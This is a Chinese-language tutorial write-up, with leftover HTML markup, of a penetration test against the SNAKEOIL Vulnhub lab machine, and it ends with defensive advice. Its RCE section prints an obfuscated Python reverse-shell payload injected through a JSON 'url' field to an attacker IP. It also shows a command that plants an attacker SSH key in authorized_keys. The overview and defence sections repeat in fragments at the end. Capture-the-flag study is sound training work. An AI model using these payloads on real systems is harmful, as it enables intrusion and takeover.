SNAKEOIL靶机渗透测试教学文档<\/h1>

靶机概述<\/h2>
SNAKEOIL是一台包含多个漏洞的Vulnhub靶机，涉及信息收集、Web应用漏洞利用、远程代码执行(RCE)和权限提升等技术点。本教学文档将详细分析渗透过程。<\/p>

信息收集阶段<\/h2>

网络扫描<\/h3>

使用nmap进行端口扫描：<\/p>

nmap -p- 192.168.101.154 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp: OpenSSH 7.9p1<\/li>
80\/tcp: nginx 1.14.2<\/li>
8080\/tcp: nginx 1.14.2<\/li>
<\/ul>
Web目录扫描<\/h3>
使用dirb扫描Web目录：<\/p>
dirb http:\/\/192.168.101.154:8080
<\/span><\/span><\/code><\/pre>发现关键路径：<\/p>

\/registration<\/code><\/li>
\/login<\/code><\/li>
\/secret<\/code><\/li>
\/run<\/code><\/li>
<\/ul>
Web应用漏洞利用<\/h2>
用户枚举<\/h3>
在\/registration<\/code>路径发现用户信息：<\/p>

用户名: patrick<\/li>
密码哈希: $pbkdf2-sha256$29000$e0\/J.V.rVSol5HxPqdW6Nw$FZJVgjNJIw99RIiojrT\/gn9xRr9SI\/RYn.CGf84r040<\/code><\/li>
<\/ul>
认证绕过<\/h3>
尝试使用默认凭证登录：<\/p>
POST<\/span> \/login<\/span> HTTP\/<\/span>1.1<\/span>
<\/span><\/span>{
<\/span><\/span>  "username"<\/span>: "admin"<\/span>,
<\/span><\/span>  "password"<\/span>: "admin123"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>成功获取访问令牌：<\/p>
access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcyMTU3MDgwMCwianRpIjoiNjE5OWY5ZWMtZGQ1Ni00YzA2LTk5NjEtMjNiY2MyZmZhMDUzIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzIxNTcwODAwLCJleHAiOjE3MjE1NzE3MDB9.OASM_L1yp4HTQn-2DWL0RMqhMVmnQtwz3tj1GSMwHDc
<\/code><\/pre>
敏感信息发现<\/h3>
访问\/secret<\/code>端点，发现关键信息：<\/p>
commandexecutionissecret
<\/code><\/pre>
远程代码执行(RCE)<\/h2>
命令执行端点<\/h3>
发现\/run<\/code>端点接受JSON输入：<\/p>
POST<\/span> \/run<\/span> HTTP\/<\/span>1.1<\/span>
<\/span><\/span>{
<\/span><\/span>  "url"<\/span>: "127.0.0.1:22"<\/span>,
<\/span><\/span>  "secret_key"<\/span>: "commandexecutionissecret"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>RCE利用<\/h3>
构造反向shell payload：<\/p>
{
<\/span><\/span>  "url"<\/span>: "2>null;`p='pyt';b='hon';$p$b -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.101.128\",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;ip=\"ba\";a=\"sh\"; pty.spawn(ip+a)'`"<\/span>, 
<\/span><\/span>  "secret_key"<\/span>: "commandexecutionissecret"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>成功获取本地shell访问权限。<\/p>
权限提升<\/h2>
横向移动<\/h3>

在patrick用户目录下发现.ssh<\/code>文件夹<\/li>
添加攻击者公钥到authorized_keys<\/code>：<\/li>
<\/ol>
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOAuKxlopDqsLWIAFeZFEOiSBz9K\/go+OybYs5gwGEBE maptnh@maptnh'<\/span> > authorized_keys
<\/span><\/span><\/code><\/pre>密码发现<\/h3>
检查\/home\/patrick\/flask_blog\/app.py<\/code>文件，发现硬编码密码：<\/p>
NOreasonableDOUBTthisPASSWORDisGOOD
<\/code><\/pre>
Sudo权限提升<\/h3>
patrick用户具有sudo权限：<\/p>
sudo \/bin\/bash
<\/span><\/span><\/code><\/pre>使用发现的密码成功提权至root。<\/p>
总结<\/h2>
本靶机渗透过程涉及以下关键技术点：<\/p>

信息收集：端口扫描、目录爆破<\/li>
Web漏洞利用：默认凭证、敏感信息泄露<\/li>
远程代码执行：通过构造恶意输入实现<\/li>
权限提升：SSH密钥注入、sudo提权<\/li>
<\/ol>
防御建议<\/h2>

避免使用默认或弱密码<\/li>
不要将敏感信息硬编码在代码中<\/li>
限制sudo权限<\/li>
对用户输入进行严格过滤<\/li>
定期更新服务组件<\/li>
禁用不必要的服务<\/li>
<\/ol>

SNAKEOIL靶机渗透测试教学文档<\/h1>

靶机概述<\/h2> SNAKEOIL是一台包含多个漏洞的Vulnhub靶机，涉及信息收集、Web应用漏洞利用、远程代码执行(RCE)和权限提升等技术点。本教学文档将详细分析渗透过程。<\/p>

信息收集阶段<\/h2>

Web应用漏洞利用<\/h2>

远程代码执行(RCE)<\/h2>

权限提升<\/h2>

防御建议<\/h2> 避免使用默认或弱密码<\/li> 不要将敏感信息硬编码在代码中<\/li> 限制sudo权限<\/li> 对用户输入进行严格过滤<\/li> 定期更新服务组件<\/li> 禁用不必要的服务<\/li> <\/ol>

靶机概述<\/h2>
SNAKEOIL是一台包含多个漏洞的Vulnhub靶机，涉及信息收集、Web应用漏洞利用、远程代码执行(RCE)和权限提升等技术点。本教学文档将详细分析渗透过程。<\/p>

防御建议<\/h2>

避免使用默认或弱密码<\/li>
不要将敏感信息硬编码在代码中<\/li>
限制sudo权限<\/li>
对用户输入进行严格过滤<\/li>
定期更新服务组件<\/li>
禁用不必要的服务<\/li> <\/ol>